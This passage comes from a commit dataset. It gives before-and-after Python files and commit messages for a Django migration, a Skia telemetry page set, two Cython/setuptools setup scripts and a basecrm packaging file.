                ('min_price', models.PositiveIntegerField(default=1, blank=True)),
                ('is_published', models.BooleanField(default=False)),
                ('is_verified', models.BooleanField(default=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the resources app: creates ``Resource``."""

    dependencies = [
        # author is a FK to the swappable user model; auth and
        # contenttypes must therefore be migrated first.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('auth', '__first__'),
        ('contenttypes', '__first__'),
    ]

    operations = [
        migrations.CreateModel(
            name='Resource',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('title', models.CharField(max_length=64)),
                ('description', models.TextField()),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
                ('file', models.FileField(upload_to='resources/')),
                ('min_price', models.PositiveIntegerField(default=1, blank=True)),
                ('is_published', models.BooleanField(default=False)),
                ('is_verified', models.BooleanField(default=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| Add dependencies to contenttypes to the migration | Add dependencies to contenttypes to the migration
| Python | mit | vladimiroff/humble-media,vladimiroff/humble-media | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
Add dependencies to contenttypes to the migration | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| <commit_before># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the resources app: creates ``Resource``."""

    dependencies = [
        # NOTE(review): the author FK targets the swappable user model;
        # explicit ('auth', '__first__') / ('contenttypes', '__first__')
        # dependencies appear to be missing — confirm migration ordering.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Resource',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('title', models.CharField(max_length=64)),
                ('description', models.TextField()),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
                ('file', models.FileField(upload_to='resources/')),
                ('min_price', models.PositiveIntegerField(default=1, blank=True)),
                ('is_published', models.BooleanField(default=False)),
                ('is_verified', models.BooleanField(default=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
<commit_msg>Add dependencies to contenttypes to the migration<commit_after> | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial migration for the resources app: creates ``Resource``."""

    dependencies = [
        # author is a FK to the swappable user model; auth and
        # contenttypes must therefore be migrated first.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('auth', '__first__'),
        ('contenttypes', '__first__'),
    ]

    operations = [
        migrations.CreateModel(
            name='Resource',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('title', models.CharField(max_length=64)),
                ('description', models.TextField()),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
                ('file', models.FileField(upload_to='resources/')),
                ('min_price', models.PositiveIntegerField(default=1, blank=True)),
                ('is_published', models.BooleanField(default=False)),
                ('is_verified', models.BooleanField(default=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
Add dependencies to contenttypes to the migration# encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| <commit_before># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
<commit_msg>Add dependencies to contenttypes to the migration<commit_after># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
|
430fd5393668249f01a2b941eef62569d758c6cf | tools/skp/page_sets/skia_intelwiki_desktop.py | tools/skp/page_sets/skia_intelwiki_desktop.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
  """Desktop story for the Intel graphics Wikipedia page.

  Scrolls the page after load so the captured SKP covers the more
  interesting content below the fold.
  """

  def __init__(self, url, page_set):
    super(SkiaBuildbotDesktopPage, self).__init__(
        url=url,
        name=url,
        page_set=page_set,
        shared_page_state_class=shared_page_state.SharedDesktopPageState)
    # WPR archive used for record/replay of this story.
    self.archive_data_file = 'data/skia_intelwiki_desktop.json'

  def RunNavigateSteps(self, action_runner):
    action_runner.Navigate(self.url)
    # A short settle time suffices; the previous 120s wait only delayed
    # capture without changing the recorded content.
    action_runner.Wait(20)

  def RunPageInteractions(self, action_runner):
    # Scroll so the capture includes content below the initial viewport.
    with action_runner.CreateGestureInteraction('ScrollAction'):
      action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
  """ Pages designed to represent the median, not highly optimized web """

  def __init__(self):
    super(SkiaIntelwikiDesktopPageSet, self).__init__(
        archive_data_file='data/skia_intelwiki_desktop.json')

    # go/skia-skps-3-19
    pages = (
        'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
    )
    # One desktop story per URL in the set.
    for page_url in pages:
      self.AddStory(SkiaBuildbotDesktopPage(page_url, self))
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
  """Desktop story that records the Intel graphics Wikipedia page."""

  def __init__(self, url, page_set):
    super(SkiaBuildbotDesktopPage, self).__init__(
        url=url,
        name=url,
        page_set=page_set,
        shared_page_state_class=shared_page_state.SharedDesktopPageState)
    # WPR archive used for record/replay of this story.
    self.archive_data_file = 'data/skia_intelwiki_desktop.json'

  def RunNavigateSteps(self, action_runner):
    action_runner.Navigate(self.url)
    # Give the page time to settle before interacting.
    action_runner.Wait(20)

  def RunPageInteractions(self, action_runner):
    # Scroll so the capture covers content below the initial viewport.
    with action_runner.CreateGestureInteraction('ScrollAction'):
      action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
  """ Pages designed to represent the median, not highly optimized web """

  def __init__(self):
    super(SkiaIntelwikiDesktopPageSet, self).__init__(
        archive_data_file='data/skia_intelwiki_desktop.json')

    urls_list = [
      # go/skia-skps-3-19
      'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
    ]

    # One desktop story per URL.
    for url in urls_list:
      self.AddStory(SkiaBuildbotDesktopPage(url, self))
| Add scrolling to go to the more interesting parts of desk_intelwiki.skp | Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com>
| Python | bsd-3-clause | google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,aosp-mirror/platform_external_skia,google/skia,aosp-mirror/platform_external_skia,google/skia,google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,aosp-mirror/platform_external_skia | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com> | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| <commit_before># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
<commit_msg>Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com><commit_after> | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| <commit_before># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
<commit_msg>Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com><commit_after># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
|
902e4500b57d54a80a586b0843ff3a68706a5c58 | setup.py | setup.py | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize

# Profiling support, left disabled:
# from Cython.Compiler.Options import directive_defaults
# directive_defaults['profile'] = True

# Every module compiled to a C extension; .pyx sources first, then the
# pure-Python modules that Cython can compile as-is.
_EXTENSION_SOURCES = [
    'board_strip.pyx',
    'length_lookup_table.pyx',
    'priority_filter.py',
    'budget_searcher.py',
    'utility_calculator.py',
    'utility_stats.py',
    'direction_strips.py',
    'alpha_beta.py',
    'ab_state.py',
    'game_state.py',
    'board.py',
    'ai_player.py',
]

setup(
    name="Pentacular",
    # extra_compile_args=["-O3"] was tried here and commented out.
    ext_modules=cythonize(_EXTENSION_SOURCES),
)
| """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize

# Profiling support, left disabled:
# from Cython.Compiler.Options import directive_defaults
# directive_defaults['profile'] = True

# Only the two .pyx hot spots are compiled; the pure-Python modules
# (priority_filter, budget_searcher, utility_*, alpha_beta, ab_state,
# game_state, board, ai_player, direction_strips) are deliberately left
# interpreted — compiling them caused GUI lag.
cy_modules = [
    'board_strip.pyx',
    'length_lookup_table.pyx',
]

setup(
    name="Pentacular",
    # Pass cy_modules instead of repeating the list inline: the previous
    # version built cy_modules (plus a dead `if False:` extend block)
    # but never used it, duplicating the source list.
    ext_modules=cythonize(cy_modules),
)
| Remove py modules causing GUI lag | Remove py modules causing GUI lag
| Python | mit | cropleyb/pentai,cropleyb/pentai,cropleyb/pentai | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
Remove py modules causing GUI lag | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| <commit_before>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
<commit_msg>Remove py modules causing GUI lag<commit_after> | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
Remove py modules causing GUI lag"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| <commit_before>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
<commit_msg>Remove py modules causing GUI lag<commit_after>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
|
24773383448698c71c5e83810b767e3a7c0900fb | setup.py | setup.py | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
